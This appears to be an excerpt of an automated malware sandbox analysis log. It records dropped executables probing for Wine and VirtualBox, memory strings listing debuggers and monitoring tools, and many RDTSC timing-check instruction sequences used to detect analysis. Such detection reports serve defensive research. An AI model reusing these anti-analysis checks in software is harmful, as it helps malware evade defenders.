                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000000.2804252018.000000000041F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F511 second address: C2F52F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F7AB0FF7760h 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F52F second address: C2EDD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a cmc 0x0000000b push dword ptr [ebp+122D0ED9h] 0x00000011 or dword ptr [ebp+122D1DF2h], esi 0x00000017 sub dword ptr [ebp+122D1DFAh], edi 0x0000001d call dword ptr [ebp+122D20CAh] 0x00000023 pushad 0x00000024 jc 00007F7AB12EBC8Ch 0x0000002a xor dword ptr [ebp+122D1DBCh], ebx 0x00000030 clc 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D1DECh], eax 0x00000039 pushad 0x0000003a sub dword ptr [ebp+122D1DECh], eax 0x00000040 mov ecx, dword ptr [ebp+122D2D0Ch] 0x00000046 popad 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b mov dword ptr [ebp+122D1E1Dh], eax 0x00000051 mov dword ptr [ebp+122D2F4Ch], eax 0x00000057 pushad 0x00000058 sub edi, dword ptr [ebp+122D2F44h] 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 pushad 0x00000065 mov edx, 7D9B48C0h 0x0000006a jno 00007F7AB12EBC89h 0x00000070 popad 0x00000071 add esi, dword ptr [esp+24h] 0x00000075 add dword ptr [ebp+122D2FD4h], ebx 0x0000007b lodsw 0x0000007d pushad 0x0000007e jnc 00007F7AB12EBC88h 0x00000084 jc 00007F7AB12EBC8Ch 0x0000008a or dword ptr [ebp+122D1DCFh], edi 0x00000090 popad 0x00000091 add eax, dword ptr [esp+24h] 0x00000095 or dword ptr [ebp+122D1DECh], esi 0x0000009b mov ebx, dword ptr [esp+24h] 0x0000009f add dword ptr [ebp+122D2F9Ch], ecx 0x000000a5 jmp 00007F7AB12EBC8Bh 0x000000aa nop 0x000000ab pushad 0x000000ac push ebx 0x000000ad push eax 0x000000ae push edx 0x000000af rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2EDD4 second address: C2EDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F7AB0FF7766h 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F7AB0FF7764h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2EDFA second address: C2EE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAADDC second address: DAADE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB270 second address: DAB276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB534 second address: DAB53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE408 second address: DAE449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a mov dword ptr [ebp+122D1DB2h], esi 0x00000010 sub dword ptr [ebp+122D30B6h], edx 0x00000016 popad 0x00000017 jmp 00007F7AB12EBC8Bh 0x0000001c push 00000000h 0x0000001e jmp 00007F7AB12EBC93h 0x00000023 push 240A0040h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE449 second address: DAE44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE44D second address: DAE521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F7AB12EBC8Bh 0x0000000c pop edi 0x0000000d popad 0x0000000e xor dword ptr [esp], 240A00C0h 0x00000015 jg 00007F7AB12EBCA5h 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F7AB12EBC88h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 call 00007F7AB12EBC93h 0x0000003c mov ecx, dword ptr [ebp+122D2D14h] 0x00000042 pop esi 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F7AB12EBC88h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f push 00000003h 0x00000061 clc 0x00000062 push BE599BBEh 0x00000067 pushad 0x00000068 jmp 00007F7AB12EBC97h 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F7AB12EBC94h 0x00000074 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE631 second address: DAE637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE637 second address: DAE655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F7AB12EBC95h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE655 second address: DAE692 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F7AB0FF7758h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov edx, dword ptr [ebp+122D1C3Bh] 0x0000002b mov edx, dword ptr [ebp+122D2F68h] 0x00000031 push 567BE0B2h 0x00000036 push edi 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE692 second address: DAE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 xor dword ptr [esp], 567BE032h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7AB12EBC88h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push edi 0x00000028 call 00007F7AB12EBC8Ah 0x0000002d pop edx 0x0000002e pop edi 0x0000002f push 00000003h 0x00000031 mov dword ptr [ebp+122D3A09h], edi 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D1DE0h], esi 0x0000003f push 00000003h 0x00000041 adc ch, 0000007Ah 0x00000044 call 00007F7AB12EBC89h 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE6EC second address: DAE6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE6F2 second address: DAE6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE6FA second address: DAE739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7AB0FF7756h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007F7AB0FF775Ch 0x00000014 jmp 00007F7AB0FF775Eh 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7AB0FF7760h 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE739 second address: DAE753 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7AB12EBC88h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7AB12EBC8Ah 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE753 second address: DAE7B2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7AB0FF776Ch 0x00000008 jmp 00007F7AB0FF7766h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 jbe 00007F7AB0FF776Dh 0x0000001e jmp 00007F7AB0FF7767h 0x00000023 popad 0x00000024 pop eax 0x00000025 lea ebx, dword ptr [ebp+124532C3h] 0x0000002b mov edx, dword ptr [ebp+122D1DB7h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jbe 00007F7AB0FF7758h 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE84D second address: DAE857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7AB12EBC86h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFC44 second address: DCFC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFC4A second address: DCFC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDA64 second address: DCDA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDA69 second address: DCDA94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F7AB12EBC9Bh 0x00000012 jmp 00007F7AB12EBC95h 0x00000017 push esi 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pop esi 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDA94 second address: DCDAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7AB0FF7756h 0x0000000a jmp 00007F7AB0FF775Dh 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDED4 second address: DCDEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE015 second address: DCE033 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7762h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE033 second address: DCE039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE039 second address: DCE03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE03F second address: DCE061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d ja 00007F7AB12EBC86h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE38A second address: DCE39E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F7AB0FF7756h 0x0000000e jnp 00007F7AB0FF7756h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE39E second address: DCE3B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC94h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE3B6 second address: DCE3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE55D second address: DCE56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7AB12EBC86h 0x0000000a jno 00007F7AB12EBC86h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEB29 second address: DCEB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007F7AB0FF775Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEB38 second address: DCEB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEB3E second address: DCEB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEB42 second address: DCEB8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007F7AB12EBC86h 0x0000000f jmp 00007F7AB12EBC96h 0x00000014 jmp 00007F7AB12EBC94h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F7AB12EBC8Eh 0x00000024 pushad 0x00000025 popad 0x00000026 jns 00007F7AB12EBC86h 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF7F9 second address: DCF7FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF7FD second address: DCF814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007F7AB12EBC86h 0x0000000d pop edx 0x0000000e pushad 0x0000000f jc 00007F7AB12EBC86h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFA9A second address: DCFAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F7AB0FF7756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFAA4 second address: DCFAB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3D75 second address: DD3D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2A4E second address: DD2A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDA85C second address: DDA861 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDAB2E second address: DDAB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDAB34 second address: DDAB56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7AB0FF7769h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB23D second address: DDB268 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7AB12EBCA2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB268 second address: DDB284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF7768h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB284 second address: DDB288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE597 second address: DDE59D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE642 second address: DDE695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b or dword ptr [ebp+122D1EE7h], ecx 0x00000011 pushad 0x00000012 je 00007F7AB12EBC89h 0x00000018 adc bl, FFFFFFCEh 0x0000001b call 00007F7AB12EBC99h 0x00000020 pushad 0x00000021 popad 0x00000022 pop ebx 0x00000023 popad 0x00000024 call 00007F7AB12EBC89h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7AB12EBC8Fh 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE695 second address: DDE69F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE69F second address: DDE6C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F7AB12EBC90h 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F7AB12EBC86h 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE6C0 second address: DDE6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE6C4 second address: DDE6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007F7AB12EBC93h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEB49 second address: DDEB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEBF0 second address: DDEC07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7AB12EBC8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEEB9 second address: DDEEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEEBD second address: DDEEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F7AB12EBC8Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F7AB12EBC86h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF367 second address: DDF36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF697 second address: DDF6A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7AB12EBC86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF734 second address: DDF742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7AB0FF7756h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF742 second address: DDF751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF7EE second address: DDF7F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF7F4 second address: DDF7FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF893 second address: DDF899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
